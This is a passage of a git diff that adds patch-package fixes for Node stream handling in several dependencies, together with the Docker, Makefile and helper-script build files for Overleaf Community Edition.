+@@ -232,7 +232,7 @@ function retryRequest(requestOpts, opts, callback) { + // No more attempts need to be made, just continue on. + if (streamMode) { + retryStream.emit('response', response); +- delayStream.pipe(retryStream); ++ pipeline(delayStream, retryStream, () => {}); + requestStream.on('error', err => { + retryStream.destroy(err); + }); diff --git a/patches/@google-cloud+storage++teeny-request+8.0.2.patch b/patches/@google-cloud+storage++teeny-request+8.0.2.patch new file mode 100644 index 0000000..738eef5 --- /dev/null +++ b/patches/@google-cloud+storage++teeny-request+8.0.2.patch @@ -0,0 +1,50 @@ +diff --git a/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js b/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js +index a2251ca..e29e796 100644 +--- a/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js ++++ b/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js +@@ -166,27 +166,27 @@ function teenyRequest(reqOpts, callback) { + } + if (callback === undefined) { + // Stream mode +- const requestStream = streamEvents(new stream_1.PassThrough()); +- // eslint-disable-next-line @typescript-eslint/no-explicit-any +- let responseStream; +- requestStream.once('reading', () => { +- if (responseStream) { +- responseStream.pipe(requestStream); +- } +- else { +- requestStream.once('response', () => { +- responseStream.pipe(requestStream); +- }); +- } +- }); ++ const requestStream = new stream_1.PassThrough(); ++ // // eslint-disable-next-line @typescript-eslint/no-explicit-any ++ // let responseStream; ++ // requestStream.once('reading', () => { ++ // if (responseStream) { ++ // responseStream.pipe(requestStream); ++ // } ++ // else { ++ // requestStream.once('response', () => { ++ // responseStream.pipe(requestStream); ++ // }); ++ // } ++ // }); + options.compress = false; + teenyRequest.stats.requestStarting(); + (0, node_fetch_1.default)(uri, options).then(res => { +- teenyRequest.stats.requestFinished(); +- responseStream = res.body; +- responseStream.on('error', (err) => { +- requestStream.emit('error', err); +- }); ++ teenyRequest.stats.requestFinished(); stream_1.pipeline(res.body, requestStream, () => {}); ++ // responseStream = res.body; ++ // responseStream.on('error', (err) => { ++ // requestStream.emit('error', err); ++ // }); + const response = fetchToRequestResponse(options, res); + requestStream.emit('response', response); + }, err => { diff --git a/patches/README.md b/patches/README.md new file mode 100644 index 0000000..c158e27 --- /dev/null +++ b/patches/README.md @@ -0,0 +1 @@ +The patches in this folder are applied by `patch-package` to dependencies, particularly those which need changes that are difficult to apply upstream. diff --git a/patches/body-parser+1.20.3.patch b/patches/body-parser+1.20.3.patch new file mode 100644 index 0000000..b41d212 --- /dev/null +++ b/patches/body-parser+1.20.3.patch @@ -0,0 +1,44 @@ +diff --git a/node_modules/body-parser/lib/read.js b/node_modules/body-parser/lib/read.js +index fce6283..6131c31 100644 +--- a/node_modules/body-parser/lib/read.js ++++ b/node_modules/body-parser/lib/read.js +@@ -18,7 +18,7 @@ var iconv = require('iconv-lite') + var onFinished = require('on-finished') + var unpipe = require('unpipe') + var zlib = require('zlib') +- ++var Stream = require('stream') + /** + * Module exports. + */ +@@ -166,25 +166,25 @@ function contentstream (req, debug, inflate) { + case 'deflate': + stream = zlib.createInflate() + debug('inflate body') +- req.pipe(stream) ++ // req.pipe(stream) + break + case 'gzip': + stream = zlib.createGunzip() + debug('gunzip body') +- req.pipe(stream) ++ // req.pipe(stream) + break + case 'identity': + stream = req + stream.length = length +- break ++ return req + default: + throw createError(415, 'unsupported content encoding "' + encoding + '"', { + encoding: encoding, + type: 'encoding.unsupported' + }) + } +- +- return stream ++ var pass = new Stream.PassThrough(); Stream.pipeline(req, stream, pass, () => {}) ++ return pass + } + + /** diff --git a/patches/forwarded+0.2.0.patch b/patches/forwarded+0.2.0.patch new file mode 100644 index 0000000..7c13376 --- /dev/null +++ b/patches/forwarded+0.2.0.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/forwarded/index.js b/node_modules/forwarded/index.js +index b2b6bdd..75e6254 100644 +--- a/node_modules/forwarded/index.js ++++ b/node_modules/forwarded/index.js +@@ -46,7 +46,7 @@ function forwarded (req) { + function getSocketAddr (req) { + return req.socket + ? req.socket.remoteAddress +- : req.connection.remoteAddress ++ : req.connection && req.connection.remoteAddress + } + + /** diff --git a/patches/node-fetch+2.7.0.patch b/patches/node-fetch+2.7.0.patch new file mode 100644 index 0000000..49d0752 --- /dev/null +++ b/patches/node-fetch+2.7.0.patch @@ -0,0 +1,76 @@ +diff --git a/node_modules/node-fetch/lib/index.js b/node_modules/node-fetch/lib/index.js +index 567ff5d..8eb45f7 100644 +--- a/node_modules/node-fetch/lib/index.js ++++ b/node_modules/node-fetch/lib/index.js +@@ -545,8 +545,8 @@ function clone(instance) { + // tee instance body + p1 = new PassThrough(); + p2 = new PassThrough(); +- body.pipe(p1); +- body.pipe(p2); ++ Stream.pipeline(body, p1, () => {}); ++ Stream.pipeline(body, p2, () => {}); + // set instance body to teed body and return the other teed body + instance[INTERNALS].body = p1; + body = p2; +@@ -648,14 +648,14 @@ function writeToStream(dest, instance) { + // body is null + dest.end(); + } else if (isBlob(body)) { +- body.stream().pipe(dest); ++ Stream.pipeline(body.stream(), dest, () => {}); + } else if (Buffer.isBuffer(body)) { + // body is buffer + dest.write(body); + dest.end(); + } else { + // body is stream +- body.pipe(dest); ++ Stream.pipeline(body, dest, () => {}); + } + } + +@@ -1638,7 +1638,7 @@ function fetch(url, opts) { + res.once('end', function () { + if (signal) signal.removeEventListener('abort', abortAndFinalize); + }); +- let body = res.pipe(new PassThrough$1()); ++ let body = Stream.pipeline(res, new PassThrough(), error => { if (error) reject(error); }); + + const response_options = { + url: request.url, +@@ -1679,7 +1679,7 @@ function fetch(url, opts) { + + // for gzip + if (codings == 'gzip' || codings == 'x-gzip') { +- body = body.pipe(zlib.createGunzip(zlibOptions)); ++ body = Stream.pipeline(body, zlib.createGunzip(zlibOptions), error => { if (error) reject(error); }); + response = new Response(body, response_options); + resolve(response); + return; +@@ -1689,13 +1689,13 @@ function fetch(url, opts) { + if (codings == 'deflate' || codings == 'x-deflate') { + // handle the infamous raw deflate response from old servers + // a hack for old IIS and Apache servers +- const raw = res.pipe(new PassThrough$1()); ++ const raw = Stream.pipeline(res, new PassThrough(), error => { if (error) reject(error); }); + raw.once('data', function (chunk) { + // see http://stackoverflow.com/questions/37519828 + if ((chunk[0] & 0x0F) === 0x08) { +- body = body.pipe(zlib.createInflate()); ++ body = Stream.pipeline(body, zlib.createInflate(), error => { if (error) reject(error); }); + } else { +- body = body.pipe(zlib.createInflateRaw()); ++ body = Stream.pipeline(body, zlib.createInflateRaw(), error => { if (error) reject(error); }); + } + response = new Response(body, response_options); + resolve(response); +@@ -1712,7 +1712,7 @@ function fetch(url, opts) { + + // for br + if (codings == 'br' && typeof zlib.createBrotliDecompress === 'function') { +- body = body.pipe(zlib.createBrotliDecompress()); ++ body = Stream.pipeline(body, zlib.createBrotliDecompress(), error => { if (error) reject(error); }); + response = new Response(body, response_options); + resolve(response); + return; diff --git a/patches/passport-oauth2+1.6.1.patch b/patches/passport-oauth2+1.6.1.patch new file mode 100644 index 0000000..25a571b --- /dev/null +++ b/patches/passport-oauth2+1.6.1.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/passport-oauth2/lib/utils.js b/node_modules/passport-oauth2/lib/utils.js +index 486f9e1..4584507 100644 +--- a/node_modules/passport-oauth2/lib/utils.js ++++ b/node_modules/passport-oauth2/lib/utils.js +@@ -24,7 +24,7 @@ exports.originalURL = function(req, options) { + var trustProxy = options.proxy; + + var proto = (req.headers['x-forwarded-proto'] || '').toLowerCase() +- , tls = req.connection.encrypted || (trustProxy && 'https' == proto.split(/\s*,\s*/)[0]) ++ , tls = (req.connection && req.connection.encrypted) || (trustProxy && 'https' == proto.split(/\s*,\s*/)[0]) + , host = (trustProxy && req.headers['x-forwarded-host']) || req.headers.host + , protocol = tls ? 'https' : 'http' + , path = req.url || ''; diff --git a/patches/retry-request+4.2.2.patch b/patches/retry-request+4.2.2.patch new file mode 100644 index 0000000..f3096b5 --- /dev/null +++ b/patches/retry-request+4.2.2.patch @@ -0,0 +1,30 @@ +diff --git a/node_modules/retry-request/index.js b/node_modules/retry-request/index.js +index 6cd6f65..39efb89 100644 +--- a/node_modules/retry-request/index.js ++++ b/node_modules/retry-request/index.js +@@ -1,6 +1,6 @@ + 'use strict'; + +-var { PassThrough } = require('stream'); ++var { PassThrough, pipeline } = require('stream'); + var debug = require('debug')('retry-request'); + var extend = require('extend'); + +@@ -164,7 +164,7 @@ function retryRequest(requestOpts, opts, callback) { + }) + .on('complete', retryStream.emit.bind(retryStream, 'complete')); + +- requestStream.pipe(delayStream); ++ pipeline(requestStream, delayStream, () => {}); + } else { + activeRequest = opts.request(requestOpts, onResponse); + } +@@ -220,7 +220,7 @@ function retryRequest(requestOpts, opts, callback) { + // No more attempts need to be made, just continue on. + if (streamMode) { + retryStream.emit('response', response); +- delayStream.pipe(retryStream); ++ pipeline(delayStream, retryStream, () => {}); + requestStream.on('error', function (err) { + retryStream.destroy(err); + }); diff --git a/patches/send+0.19.0.patch b/patches/send+0.19.0.patch new file mode 100644 index 0000000..6635078 --- /dev/null +++ b/patches/send+0.19.0.patch @@ -0,0 +1,57 @@ +diff --git a/node_modules/send/index.js b/node_modules/send/index.js +index 768f8ca..a882f4d 100644 +--- a/node_modules/send/index.js ++++ b/node_modules/send/index.js +@@ -788,29 +788,29 @@ SendStream.prototype.stream = function stream (path, options) { + // pipe + var stream = fs.createReadStream(path, options) + this.emit('stream', stream) +- stream.pipe(res) +- +- // cleanup +- function cleanup () { +- destroy(stream, true) +- } +- +- // response finished, cleanup +- onFinished(res, cleanup) +- +- // error handling +- stream.on('error', function onerror (err) { +- // clean up stream early +- cleanup() +- +- // error +- self.onStatError(err) +- }) +- +- // end +- stream.on('end', function onend () { +- self.emit('end') +- }) ++ Stream.pipeline(stream, res, err => { if (err) { self.onStatError(err) } else { self.emit('end') } }) ++ ++ // // cleanup ++ // function cleanup () { ++ // destroy(stream, true) ++ // } ++ // ++ // // response finished, cleanup ++ // onFinished(res, cleanup) ++ // ++ // // error handling ++ // stream.on('error', function onerror (err) { ++ // // clean up stream early ++ // cleanup() ++ // ++ // // error ++ // self.onStatError(err) ++ // }) ++ // ++ // // end ++ // stream.on('end', function onend () { ++ // self.emit('end') ++ // }) + } + + /** diff --git a/patches/teeny-request+7.1.3.patch b/patches/teeny-request+7.1.3.patch new file mode 100644 index 0000000..213ed04 --- /dev/null +++ b/patches/teeny-request+7.1.3.patch @@ -0,0 +1,49 @@ +diff --git a/node_modules/teeny-request/build/src/index.js b/node_modules/teeny-request/build/src/index.js +index f209888..e9fe982 100644 +--- a/node_modules/teeny-request/build/src/index.js ++++ b/node_modules/teeny-request/build/src/index.js +@@ -166,27 +166,27 @@ function teenyRequest(reqOpts, callback) { + } + if (callback === undefined) { + // Stream mode +- const requestStream = streamEvents(new stream_1.PassThrough()); ++ const requestStream = new stream_1.PassThrough(); + // eslint-disable-next-line @typescript-eslint/no-explicit-any +- let responseStream; +- requestStream.once('reading', () => { +- if (responseStream) { +- responseStream.pipe(requestStream); +- } +- else { +- requestStream.once('response', () => { +- responseStream.pipe(requestStream); +- }); +- } +- }); ++ // let responseStream; ++ // requestStream.once('reading', () => { ++ // if (responseStream) { ++ // responseStream.pipe(requestStream); ++ // } ++ // else { ++ // requestStream.once('response', () => { ++ // responseStream.pipe(requestStream); ++ // }); ++ // } ++ // }); + options.compress = false; + teenyRequest.stats.requestStarting(); + node_fetch_1.default(uri, options).then(res => { +- teenyRequest.stats.requestFinished(); +- responseStream = res.body; +- responseStream.on('error', (err) => { +- requestStream.emit('error', err); +- }); ++ teenyRequest.stats.requestFinished(); stream_1.pipeline(res.body, requestStream, () => {}); ++ // responseStream = res.body; ++ // responseStream.on('error', (err) => { ++ // requestStream.emit('error', err); ++ // }); + const response = fetchToRequestResponse(options, res); + requestStream.emit('response', response); + }, err => { diff --git a/patches/thread-loader+4.0.2.patch b/patches/thread-loader+4.0.2.patch new file mode 100644 index 0000000..25b9691 --- /dev/null +++ b/patches/thread-loader+4.0.2.patch @@ -0,0 +1,81 @@ +diff --git a/node_modules/thread-loader/dist/WorkerPool.js b/node_modules/thread-loader/dist/WorkerPool.js +index 4145779..f0ff068 100644 +--- a/node_modules/thread-loader/dist/WorkerPool.js ++++ b/node_modules/thread-loader/dist/WorkerPool.js +@@ -258,6 +258,19 @@ class PoolWorker { + finalCallback(); + break; + } ++ case 'logMessage': ++ { ++ const { ++ data: { loggerName, methodName, args } ++ } = message; ++ const { ++ data: jobData ++ } = this.jobs[id]; ++ const logger = jobData.getLogger(loggerName); ++ logger[methodName].apply(logger, args); ++ finalCallback(); ++ break; ++ } + case 'emitWarning': + { + const { +diff --git a/node_modules/thread-loader/dist/index.js b/node_modules/thread-loader/dist/index.js +index 75cd30f..d834af6 100644 +--- a/node_modules/thread-loader/dist/index.js ++++ b/node_modules/thread-loader/dist/index.js +@@ -43,6 +43,7 @@ function pitch() { + sourceMap: this.sourceMap, + emitError: this.emitError, + emitWarning: this.emitWarning, ++ getLogger: this.getLogger, + loadModule: this.loadModule, + resolve: this.resolve, + getResolve: this.getResolve, +diff --git a/node_modules/thread-loader/dist/worker.js b/node_modules/thread-loader/dist/worker.js +index 8e67959..aca94f1 100644 +--- a/node_modules/thread-loader/dist/worker.js ++++ b/node_modules/thread-loader/dist/worker.js +@@ -90,6 +90,22 @@ function writeJson(data) { + writePipeWrite(lengthBuffer); + writePipeWrite(messageBuffer); + } ++const LOGGER_METHODS = ['error', 'warn', 'info', 'log', 'debug', 'trace', 'group', 'groupEnd', 'groupCollapsed', 'status', 'clear', 'profile', 'profileEnd']; ++class Logger { ++ constructor(id, loggerName) { ++ this.id = id ++ this.loggerName = loggerName ++ for (const methodName of LOGGER_METHODS) { ++ this[methodName] = (...args) => { ++ writeJson({ ++ type: 'logMessage', ++ id: this.id, ++ data: { loggerName, methodName, args } ++ }) ++ } ++ } ++ } ++} + const queue = (0, _queue.default)(({ + id, + data +@@ -190,6 +206,7 @@ const queue = (0, _queue.default)(({ + } + return options; + }, ++ getLogger: (name) => new Logger(id, name), + emitWarning: warning => { + writeJson({ + type: 'emitWarning', +@@ -211,6 +228,9 @@ const queue = (0, _queue.default)(({ + module._compile(code, filename); // eslint-disable-line no-underscore-dangle + return module.exports; + }, ++ addDependency: filename => { ++ buildDependencies.push(filename); ++ }, + addBuildDependency: filename => { + buildDependencies.push(filename); + }, diff --git a/server-ce/.editorconfig b/server-ce/.editorconfig new file mode 100644 index 0000000..9d08a1a --- /dev/null +++ b/server-ce/.editorconfig @@ -0,0 +1,9 @@ +root = true + +[*] +charset = utf-8 +indent_style = space +indent_size = 2 +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true diff --git a/server-ce/.eslintrc b/server-ce/.eslintrc new file mode 100644 index 0000000..fc58ef3 --- /dev/null +++ b/server-ce/.eslintrc @@ -0,0 +1,25 @@ +{ + "extends": [ + "eslint:recommended", + "standard", + "prettier" + ], + "plugins": [ + "unicorn" + ], + "parserOptions": { + "ecmaVersion": 2020 + }, + "env": { + "node": true + }, + "rules": { + // Do not allow importing of implicit dependencies. + "import/no-extraneous-dependencies": "error", + "unicorn/prefer-node-protocol": "error" + }, + "overrides": [ + // Extra rules for Cypress tests + { "files": ["**/*.spec.ts"], "extends": ["plugin:cypress/recommended"] } + ] +} diff --git a/server-ce/Dockerfile b/server-ce/Dockerfile new file mode 100644 index 0000000..be2d652 --- /dev/null +++ b/server-ce/Dockerfile @@ -0,0 +1,143 @@ +# --------------------------------------------- +# Overleaf Community Edition (overleaf/overleaf) +# --------------------------------------------- + +ARG OVERLEAF_BASE_TAG=sharelatex/sharelatex-base:arm64 +FROM $OVERLEAF_BASE_TAG + +WORKDIR /overleaf + +# Add required source files +# ------------------------- +ADD server-ce/genScript.js /overleaf/genScript.js +ADD server-ce/services.js /overleaf/services.js +ADD package.json package-lock.json /overleaf/ +ADD libraries/ /overleaf/libraries/ +ADD services/ /overleaf/services/ + +# Add npm patches +# ----------------------- +ADD patches/ /overleaf/patches + +# Install npm dependencies and build webpack assets +# ------------------------ +RUN --mount=type=cache,target=/root/.cache \ + --mount=type=cache,target=/root/.npm \ + --mount=type=cache,target=/overleaf/services/web/node_modules/.cache,id=server-ce-webpack-cache \ + --mount=type=tmpfs,target=/tmp true \ +&& node genScript install | bash \ +&& node genScript compile | bash + +# Copy runit service startup scripts to its location +# -------------------------------------------------- +ADD server-ce/runit /etc/service + +# Copy runit global settings to its location +# ------------------------------------------ +ADD server-ce/config/env.sh /etc/overleaf/env.sh + +# Configure nginx +# --------------- +ADD server-ce/nginx/nginx.conf.template /etc/nginx/templates/nginx.conf.template +ADD server-ce/nginx/overleaf.conf /etc/nginx/sites-enabled/overleaf.conf +ADD server-ce/nginx/clsi-nginx.conf /etc/nginx/sites-enabled/clsi-nginx.conf + + +# Configure log rotation +# ---------------------- +ADD server-ce/logrotate/overleaf /etc/logrotate.d/overleaf +RUN chmod 644 /etc/logrotate.d/overleaf + +# Configure cron tasks +# ---------------------- +ADD server-ce/cron /overleaf/cron +ADD server-ce/config/crontab-history /etc/cron.d/crontab-history +RUN chmod 600 /etc/cron.d/crontab-history +ADD server-ce/config/crontab-deletion /etc/cron.d/crontab-deletion +RUN chmod 600 /etc/cron.d/crontab-deletion + +# Copy Phusion Image startup and shutdown scripts to their locations +# ------------------------------------------------------------------ +COPY server-ce/init_scripts/ /etc/my_init.d/ +COPY server-ce/init_preshutdown_scripts/ /etc/my_init.pre_shutdown.d/ + +# Copy app settings files +# ----------------------- +COPY server-ce/config/settings.js /etc/overleaf/settings.js + +# Copy history-v1 files +# ----------------------- +COPY server-ce/config/production.json /overleaf/services/history-v1/config/production.json +COPY server-ce/config/custom-environment-variables.json /overleaf/services/history-v1/config/custom-environment-variables.json + +# Copy grunt thin wrapper +# ----------------------- +ADD server-ce/bin/grunt /usr/local/bin/grunt +RUN chmod +x /usr/local/bin/grunt + +# Fix error with envsubst +# ----------------------- +RUN rm -rf /etc/apt/sources.list.d/ubuntu.sources +COPY server-ce/ubuntu.sources /etc/apt/sources.list.d/ubuntu.sources +RUN apt-get update \ +&& apt-get install -y \ + gettext-base + +# Install full texlive +RUN apt-get install -y texlive-full + +# Install pygments for minted +RUN apt-get install -y python3-pygments + +# Node doesn't run with this file +# ----------------------- +RUN find / -name 'crc32c.node' -type f -delete + + + +# Copy history helper scripts +# --------------------------- +ADD server-ce/bin/flush-history-queues /overleaf/bin/flush-history-queues +RUN chmod +x /overleaf/bin/flush-history-queues +ADD server-ce/bin/force-history-resyncs /overleaf/bin/force-history-resyncs +RUN chmod +x /overleaf/bin/force-history-resyncs + +# Copy Latexmkrc +# ----------------------- +COPY server-ce/config/latexmkrc /usr/local/share/latexmk/LatexMk + +# File that controls open|closed status of the site +# ------------------------------------------------- +ENV SITE_MAINTENANCE_FILE="/etc/overleaf/site_status" +RUN touch $SITE_MAINTENANCE_FILE + +# Set Environment Variables +# -------------------------------- +ENV OVERLEAF_CONFIG=/etc/overleaf/settings.js + +ENV WEB_API_USER="overleaf" +ENV ADMIN_PRIVILEGE_AVAILABLE="true" + +ENV OVERLEAF_APP_NAME="Overleaf Community Edition" + +ENV OPTIMISE_PDF="true" + +# Phusion Image timeouts before sending SIGKILL to processes +# ---------------------------------------------------------- +ENV KILL_PROCESS_TIMEOUT=55 +ENV KILL_ALL_PROCESSES_TIMEOUT=55 +ENV GRACEFUL_SHUTDOWN_DELAY_SECONDS=1 + +ENV NODE_ENV="production" +ENV LOG_LEVEL="info" + + +EXPOSE 80 + +ENTRYPOINT ["/sbin/my_init"] + +# Store the revision +# ------------------ +# This should be the last step to optimize docker image caching. +ARG MONOREPO_REVISION +RUN echo "monorepo-server-ce,$MONOREPO_REVISION" > /var/www/revisions.txt diff --git a/server-ce/Dockerfile-base b/server-ce/Dockerfile-base new file mode 100644 index 0000000..a7836ec --- /dev/null +++ b/server-ce/Dockerfile-base @@ -0,0 +1,91 @@ +# -------------------------------------------------- +# Overleaf Base Image (sharelatex/sharelatex-base) +# -------------------------------------------------- + +FROM phusion-baseimage:offline + +# Makes sure LuaTex cache is writable +# ----------------------------------- +ENV TEXMFVAR=/var/lib/overleaf/tmp/texmf-var + +# Update to ensure dependencies are updated +# ------------------------------------------ +ENV REBUILT_AFTER="2025-03-27" + +# Install dependencies +# -------------------- +RUN --mount=type=cache,target=/var/cache/apt,sharing=locked \ +# Technically, we are using potentially stale package-lists with the below line. +# Practically, apt refreshes the lists as needed and release builds run in fresh CI VMs without the cache. + --mount=type=cache,target=/var/lib/apt/lists,sharing=locked true \ +# Enable caching: https://docs.docker.com/reference/dockerfile/#example-cache-apt-packages +&& rm -f /etc/apt/apt.conf.d/docker-clean && echo 'Binary::apt::APT::Keep-Downloaded-Packages "true";' > /etc/apt/apt.conf.d/keep-cache \ +&& apt-get update \ +&& apt-get install -y \ + unattended-upgrades \ + build-essential wget net-tools unzip time imagemagick optipng strace nginx git python3 python-is-python3 zlib1g-dev libpcre3-dev gettext-base libwww-perl ca-certificates curl gnupg \ + qpdf texlive-base latexmk texlive-extra-utils \ +# upgrade base-image, batch all the upgrades together, rather than installing them on-by-one (which is slow!) +&& unattended-upgrade --verbose --no-minimal-upgrade-steps \ +# install Node.js https://github.com/nodesource/distributions#nodejs +&& mkdir -p /etc/apt/keyrings \ +&& curl -fsSL https://deb.nodesource.com/gpgkey/nodesource-repo.gpg.key | gpg --dearmor -o /etc/apt/keyrings/nodesource.gpg \ +&& echo "deb [signed-by=/etc/apt/keyrings/nodesource.gpg] https://deb.nodesource.com/node_20.x nodistro main" | tee /etc/apt/sources.list.d/nodesource.list \ +&& apt-get update \ +&& apt-get install -y nodejs \ + \ +&& rm -rf \ +# We are adding a custom nginx config in the main Dockerfile. + /etc/nginx/nginx.conf \ + /etc/nginx/sites-enabled/default + +# Install TexLive +# --------------- +# CTAN mirrors occasionally fail, in that case install TexLive using a +# different server, for example https://ctan.crest.fr +# +# # docker build \ +# --build-arg TEXLIVE_MIRROR=https://ctan.crest.fr/tex-archive/systems/texlive/tlnet \ +# -f Dockerfile-base -t sharelatex/sharelatex-base . +# ARG TEXLIVE_MIRROR=https://mirror.ox.ac.uk/sites/ctan.org/systems/texlive/tlnet + +# RUN mkdir /install-tl-unx \ +# && wget --quiet https://tug.org/texlive/files/texlive.asc \ +# && gpg --import texlive.asc \ +# && rm texlive.asc \ +# && wget --quiet ${TEXLIVE_MIRROR}/install-tl-unx.tar.gz \ +# && wget --quiet ${TEXLIVE_MIRROR}/install-tl-unx.tar.gz.sha512 \ +# && wget --quiet ${TEXLIVE_MIRROR}/install-tl-unx.tar.gz.sha512.asc \ +# && gpg --verify install-tl-unx.tar.gz.sha512.asc \ +# && sha512sum -c install-tl-unx.tar.gz.sha512 \ +# && tar -xz -C /install-tl-unx --strip-components=1 -f install-tl-unx.tar.gz \ +# && rm install-tl-unx.tar.gz* \ +# && echo "tlpdbopt_autobackup 0" >> /install-tl-unx/texlive.profile \ +# && echo "tlpdbopt_install_docfiles 0" >> /install-tl-unx/texlive.profile \ +# && echo "tlpdbopt_install_srcfiles 0" >> /install-tl-unx/texlive.profile \ +# && echo "selected_scheme scheme-basic" >> /install-tl-unx/texlive.profile \ +# \ +# && /install-tl-unx/install-tl \ +# -profile /install-tl-unx/texlive.profile \ +# -repository ${TEXLIVE_MIRROR} \ +# \ +# && $(find /usr/local/texlive -name tlmgr) path add \ +# && tlmgr install --repository ${TEXLIVE_MIRROR} \ +# latexmk \ +# texcount \ +# synctex \ +# etoolbox \ +# xetex \ +# && tlmgr path add \ +# && rm -rf /install-tl-unx + + +# Set up overleaf user and home directory +# ----------------------------------------- +RUN adduser --system --group --home /overleaf --no-create-home overleaf && \ + mkdir -p /var/lib/overleaf && \ + chown www-data:www-data /var/lib/overleaf && \ + mkdir -p /var/log/overleaf && \ + chown www-data:www-data /var/log/overleaf && \ + mkdir -p /var/lib/overleaf/data/template_files && \ + chown www-data:www-data /var/lib/overleaf/data/template_files diff --git a/server-ce/Makefile b/server-ce/Makefile new file mode 100644 index 0000000..e90d77b --- /dev/null +++ b/server-ce/Makefile @@ -0,0 +1,60 @@ +# Makefile + +MONOREPO_ROOT := ../ +HERE=$(shell pwd) +export MONOREPO_REVISION := $(shell git rev-parse HEAD) +export BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +export OVERLEAF_BASE_BRANCH ?= sharelatex/sharelatex-base:$(BRANCH_NAME) +export OVERLEAF_BASE_LATEST ?= sharelatex/sharelatex-base +export OVERLEAF_BASE_TAG ?= sharelatex/sharelatex-base:arm64 +export OVERLEAF_BRANCH ?= sharelatex/sharelatex:$(BRANCH_NAME) +export OVERLEAF_LATEST ?= sharelatex/sharelatex +export OVERLEAF_TAG ?= sharelatex/sharelatex:arm64 + +all: build-base build-community + +build-base: + cp .dockerignore $(MONOREPO_ROOT) + docker build \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --progress=plain \ + --file Dockerfile-base \ + --tag $(OVERLEAF_BASE_TAG) \ + --tag $(OVERLEAF_BASE_BRANCH) \ + $(MONOREPO_ROOT) + + +build-community: + cp .dockerignore $(MONOREPO_ROOT) + docker build \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --progress=plain \ + --build-arg OVERLEAF_BASE_TAG \ + --build-arg MONOREPO_REVISION \ + --file Dockerfile \ + --tag $(OVERLEAF_TAG) \ + --tag $(OVERLEAF_BRANCH) \ + $(MONOREPO_ROOT) + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources \ + --exclude=SC1091 +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +.PHONY: all \ + build-base build-community \ + shellcheck shellcheck_fix diff --git a/server-ce/bin/flush-history-queues b/server-ce/bin/flush-history-queues new file mode 100755 index 0000000..b54bc55 --- /dev/null +++ b/server-ce/bin/flush-history-queues @@ -0,0 +1,8 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh +cd /overleaf/services/project-history +node scripts/flush_all.js 100000 diff --git a/server-ce/bin/force-history-resyncs b/server-ce/bin/force-history-resyncs new file mode 100755 index 0000000..389c98a --- /dev/null +++ b/server-ce/bin/force-history-resyncs @@ -0,0 +1,8 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh +cd /overleaf/services/project-history +node scripts/force_resync.js 1000 force diff --git a/server-ce/bin/grunt b/server-ce/bin/grunt new file mode 100755 index 0000000..462c68d --- /dev/null +++ b/server-ce/bin/grunt @@ -0,0 +1,36 @@ +#!/bin/bash +# Thin wrapper on old grunt tasks to ease migrating. + +set -e +set -x +TASK="$1" +shift 1 + +cd /overleaf/services/web + +case "$TASK" in + user:create-admin) + echo "The grunt command is deprecated, run the create-user script using node instead" + node modules/server-ce-scripts/scripts/create-user.mjs --admin "$@" + ;; + + user:delete) + echo "The grunt command is deprecated, run the delete-user script using node instead" + node modules/server-ce-scripts/scripts/delete-user.mjs "$@" + ;; + + check:mongo) + echo "The grunt command is deprecated, run the check-mongodb script using node instead" + node modules/server-ce-scripts/scripts/check-mongodb.mjs + ;; + + check:redis) + echo "The grunt command is deprecated, run the check-redis script using node instead" + node modules/server-ce-scripts/scripts/check-redis.mjs + ;; + + *) + echo "Unknown task $TASK" + exit 1 + ;; +esac diff --git a/server-ce/bin/rename-env-vars-5-0.sh b/server-ce/bin/rename-env-vars-5-0.sh new file mode 100755 index 0000000..292d698 --- /dev/null +++ b/server-ce/bin/rename-env-vars-5-0.sh @@ -0,0 +1,18 @@ +#!/bin/bash + +set -euo pipefail + +FILE=${1:-docker-compose.yml} +if [[ ! -f "$FILE" ]]; then + echo "Expected to find $FILE, are you in the wrong directory?" + exit 2 +fi + +BACKUP_FILE="$FILE.$(date '+%Y.%m.%d-%H.%M.%S')" +echo "Creating backup file $BACKUP_FILE" +cp "$FILE" "$BACKUP_FILE" + +echo "Replacing 'SHARELATEX_' with 'OVERLEAF_' in $FILE" +sed -i "s/SHARELATEX_/OVERLEAF_/g" "$FILE" + +echo "Done." diff --git a/server-ce/bin/shared b/server-ce/bin/shared new file mode 120000 index 0000000..418b1bc --- /dev/null +++ b/server-ce/bin/shared @@ -0,0 +1 @@ +../../bin/shared/ \ No newline at end of file diff --git a/server-ce/cloudbuild.public.yaml b/server-ce/cloudbuild.public.yaml new file mode 100644 index 0000000..f682a17 --- /dev/null +++ b/server-ce/cloudbuild.public.yaml @@ -0,0 +1,77 @@ +--- + +steps: + - id: build_base + name: us-east1-docker.pkg.dev/overleaf-ops/ol-docker/cloud-builder + dir: server-ce + args: + - 'build-base' + - id: tag_main_latest_base + name: gcr.io/cloud-builders/docker + script: | + #!/usr/bin/env bash + set -e + if [ ${BRANCH_NAME} == main ]; then + docker tag ${_IMAGE_BASE} ${_IMAGE_BASE_LATEST}; + docker push ${_IMAGE_BASE_LATEST}; + fi 